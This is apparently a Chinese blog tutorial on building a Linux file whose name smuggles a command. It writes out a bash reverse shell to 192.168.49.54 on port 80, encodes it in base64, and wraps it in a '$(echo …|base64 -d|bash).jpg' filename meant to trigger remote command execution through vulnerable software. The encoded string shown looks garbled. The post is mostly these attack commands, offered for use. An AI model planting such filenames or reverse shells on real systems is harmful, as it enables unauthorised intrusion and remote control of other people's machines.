Linux下生成包含bash命令的文件名的文件

关于如何绕过Linux限制的其他方式请查看:

https://book.hacktricks.xyz/linux-hardening/bypass-bash-restrictions

我只是为了生成/创建包含bash命令的文件名而不是详细介绍Linux系统的文件命名规范,所以只需要考虑Linux系统文件命名的部分要求,文件名中的限制字符是我需要关注的,具体可以查看"限制字符"的链接。

1.可以使用大写和小写字母、数字、"."(点)和"_"(下划线)符号。

2.允许使用 \ 符号引用或转义空格、<、>、|、\、:、(、)、&、; 以及通配符(如 ? 和 *) 。

bash 复制代码
echo $\(echo `echo '/bin/bash -i >&/dev/tcp/192.168.49.54/80 0>&1'|base64`\|base64 -d\|bash\) 

这个命令中单引号中的/bin/bash -i >&/dev/tcp/192.168.49.54/80 0>&1是反弹shell的命令,也可以换成别的命令,这里的命令将会在之后被执行。

这条命令的输出类似这样:

bash 复制代码
$(echo LJpbi9iYXNoI1pID4m2Rldi90Y3AvMLjE2OC40S41NC84MCwPiYCg==|base64 -d|bash)

输出的命令进行这样的操作:输出一段base64的字符串,然后用base64工具解码,然后再把结果交给bash命令执行。这样做的好处是避免原来命令中包含特殊字符层层转义或者导致执行失败。

我现在要生成以这个输出作为文件名的文件,用echo ''> 文件名

bash 复制代码
echo '' > '$(echo LJpbi9iYXNoI1pID4m2Rldi90Y3AvMLjE2OC40S41NC84MCwPiYCg==|base64 -d|bash).jpg'

请注意,你完全可以不加文件名后缀.jpg,这在Linux中无关紧要。

下面这个图片里你能看到最终生成的文件名。

为什么要生成/创建这样的文件?

此文件将在某些Linux软件的漏洞中会被用来进行远程命令执行,这样的手段用来绕过Linux对文件名的限制。

相关推荐
笑锝没心没肺3 小时前
fail2ban工具安装配置及使用
linux·运维·服务器
大卡片5 小时前
linux内核驱动开发
linux·运维·驱动开发
心心喵6 小时前
[linux] nohup和pm2的区别 进程保活
linux·运维·服务器
醉熏的石头7 小时前
Ubuntu 中的编程语言(中)
linux·ubuntu·scala
dddwjzx10 小时前
嵌入式Linux C应用编程入门——信号
linux·嵌入式
范什么特西11 小时前
网络代理问题
java·linux·服务器
utf8mb4安全女神11 小时前
【Redis数据库】哨兵集群/redis集群/安装配置/主从复制/数据持久化操作/数据结构/安全限制/PHP redis/
linux·服务器·数据结构·数据库·redis·缓存
Zk.Sun11 小时前
Linux设置触屏双击距离容差
linux·运维·数据库
bukeyiwanshui12 小时前
20260622 安装配置ubuntu
linux·运维·ubuntu
写代码的学渣12 小时前
Linux 安装 Swap 交换分区大小标准(通用 + 生产服务器 + 个人 PC)
linux·运维·服务器